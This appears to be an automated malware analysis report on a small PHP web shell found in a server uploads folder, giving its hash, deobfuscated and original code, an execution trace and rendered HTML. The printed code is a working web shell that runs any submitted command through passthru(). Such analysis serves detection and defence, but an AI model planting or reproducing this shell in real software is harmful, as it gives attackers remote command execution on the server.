PHP Malware Analysis
tttt.php
md5: 323adc7347df76f537801e758debe3be
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Execution
- passthru (Deobfuscated, Original)
Deobfuscated PHP code
<?php
echo "\n <FORM ACTION={$PHP_SELF} METHOD=POST>\n CMD : <INPUT TYPE=TEXT NAME=command SIZE=40>\n <INPUT TYPE=SUBMIT VALUE='Enter'></FORM>\n <HR><XMP></XMP><HR>";
$command = str_replace('/', '', $command);
echo "<XMP>";
passthru($command);
echo "</XMP>";Execution traces
data/traces/323adc7347df76f537801e758debe3be_trace-1676248254.5693.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:31:20.467095]
1 0 1 0.000191 393512
1 3 0 0.000245 394528 {main} 1 /var/www/html/uploads/tttt.php 0 0
2 4 0 0.000283 394528 str_replace 0 /var/www/html/uploads/tttt.php 7 3 '/' '' NULL
2 4 1 0.000301 394624
2 4 R ''
1 A /var/www/html/uploads/tttt.php 7 $command = ''
2 5 0 0.000326 394528 passthru 0 /var/www/html/uploads/tttt.php 8 1 ''
2 5 1 0.000348 394560
2 5 R FALSE
1 3 1 0.000362 394528
0.000388 314256
TRACE END [2023-02-12 22:31:20.467372]
Generated HTML code
<html><head></head><body><form action="METHOD=POST">
CMD : <input type="TEXT" name="command" size="40">
<input type="SUBMIT" value="Enter"></form>
<hr><xmp></xmp><hr><xmp></xmp></body></html>Original PHP code
<?php
echo "
<FORM ACTION=$PHP_SELF METHOD=POST>
CMD : <INPUT TYPE=TEXT NAME=command SIZE=40>
<INPUT TYPE=SUBMIT VALUE='Enter'></FORM>
<HR><XMP></XMP><HR>";
$command = str_replace('/', '', $command);
echo "<XMP>"; passthru($command); echo "</XMP>";
?>